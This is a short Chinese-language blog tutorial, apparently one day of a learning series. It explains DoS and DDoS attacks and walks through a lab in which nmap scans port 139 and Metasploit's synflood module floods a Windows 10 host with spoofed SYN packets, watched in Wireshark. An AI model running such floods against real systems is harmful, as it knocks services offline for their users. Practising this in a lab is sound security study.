Day19:今天来聊一下Denial-of-Service

拒绝服务(DoS)和分布式拒绝服务(DDoS)攻击已成为电脑网路的主要威胁。

这类攻击试图让机器或网路资源让授权使用者不可使用。通常DoS和DDoS

攻击利用TCP/IP模型通讯协定的漏洞或特定作业系统的错误。

在DoS攻击中,攻击者用不合法的服务请求或流量淹没受害者的系统,使其资源过载

,导致系统停机并导致受害者网站不可用

登入Parrot Security主机,输入sudo su切换身份

输入cd切换目録

输入nmap -p 139 192.168.134.128

-p为检查指定的port

接下来我们使用Metasploit的auxiliary模组(synflood)对Windows 10

执行DoS attack攻击

在KDE Terminal输入指令msfconsole,进入msf command line

并使用此模组use auxiliary/dos/tcp/synflood

输入show options检视有那些参数可以使用

输入RHOST/RPORT/SHOST参数,并输入exploit指令开始进行

开启Parrot Security的Wireshark Network Analyzer,选择eth0

即可看到一堆从Windows Server 2016 (192.168.134.137)对Windows 10 (192.168.134.128)

隔山打牛的Port 139的DOS封包一直送出来